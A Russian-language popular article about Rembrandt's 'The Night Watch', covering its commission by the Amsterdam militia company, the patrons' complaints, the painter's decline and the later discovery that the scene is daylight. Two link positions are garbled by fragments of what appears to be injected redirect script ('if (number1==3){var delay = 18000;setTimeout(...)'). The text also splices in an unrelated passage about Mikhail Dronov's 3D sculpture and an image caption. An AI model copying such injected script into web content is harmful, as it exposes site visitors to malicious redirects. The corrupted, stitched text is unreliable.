Знаете ли вы, что знаменитая картина великого Рембрандта «Ночной дозор» стала для него поворотной точкой , моментом, когда успешный художник стал превращаться в изгоя.
На его ранних автопортретах мы видим счастливого, ошалевшего от собственной удачи юношу. Рембрандт приехал в Амстердам из провинции — города Лейдена и всего достиг своим трудом и огромным талантом. Богат, знаменит, счастлив в браке! Весь город заказывает у него портреты. Он покупает огромный дом, собирает коллекцию, к нему приходят на званые вечера именитые люди. Это счастливое существование длилось 36 лет до трагического для Рембрандта 1642 года, когда умирает от туберкулеза его любимая жена Саския.
В этом же году Рембрандт берется за дорогой заказ. Это огромное полотно, изображающее «Выступление стрелковой роты капитана Франса Баннинга Кока и лейтенанта Виллема ван Рейтенбюрга». Картина была написана по заказу Стрелкового общества- отряда гражданского ополчения Амстердама. Коллективный портрет — это изобретение прижимистых голландских бюргеров — вместо 20 портретов можно было гораздо дешевле заказать один — групповой. Жанр группового портрета требовал определенных обязательств. Каждого персонажа должно быть видно, и каждый персонаж должен занимать пространство картины соответственно заплаченному взносу.
Но великий Рембрандт не может формально воспроизвести задачу простого портрета. Ему важен сюжет, идея показать группу людей — защитников, охваченных единым порывом гражданских чувств. Каждый персонаж занят своим делом, как будто эпизод выхвачен случайно Стрелки разбирают свои пики, знаменосец разворачивает пестрое полотнище, выглядывает девочка, похожая на умершую Саскию. Стреляет ружье, лает собака, барабанщик выбивает дробь — все полно звуками и жизнью.
Но заказчики остались недовольны. Кого-то видно, кого-то нет, на картине много случайных людей, которые явно не платили. А от тех, кто платил, видно то только шляпу, то нос, а они ведь хотели, чтобы их узнавали на портрете! Стрелки подали в суд ( наверное, за оскорбление чести и достоинства голландского офицера) и выиграли.
Рембрандт вынужден заплатить гигантскую неустойку. Неоднозначный резонанс по поводу «Ночного дозора» подкосил популярность художника. Его реалистический стиль смущал своей голой правдой и сильно отличался от работ модных тогда живописцев. Уменьшились доходы. Тут подтянулись кредиторы и предъявили долговые расписки. Рембрандту пришлось продать дом и коллекцию раритетов. В счет долга забирают и картину. Ее повесили в темном помещении с камином. 200 лет картина покрывалась копотью и так потемнела, что к ней пристало название «Ночной дозор». andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andt-nochnoj-dozor-ili-dnevnoj-dozor/” target=”_blank” rel=”noopener”>Только спустя годы реставраторы по тому, как ложатся тени, доказали, что на картине изображен светлый и яркий день.
Источники: Лекция Тапани Сергея Андреевича, РГУ, Википедия, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andt/pic/glrx-1109313369″ target=”_blank” rel=”noopener”>gallerix.ru
Единственное новшество, которое вполне намеренно ввел в свою 3D-композицию Михаил Дронов, — это неожиданный натюрморт. Ничего подобного у Рембрандта на картине нет, да и быть не могло. Бокал с лимоном появился — это что-то вроде авторской подписи. Как художники пишут свое имя в углу картины, так и Михаил Дронов оставил такой аналог автографа в углу композиции. Да и сам факт того, что никто и никогда не видел картину «Ночной дозор» ни сзади, ни сбоку, говорит о том, что располагаться там натюрморту никто не запрещает. Стоит добавить, что скульптурный натюрморт — один из любимых жанров Михаила Дронова.
При реставрации картины Рембрандта «Ночной дозор» мастера очистили изображение от копоти и грязи, и стало ясно, что действие на картине происходит не ночью, а при ярком свете полуденного солнца © Из коллекции Государственного музея Амстердама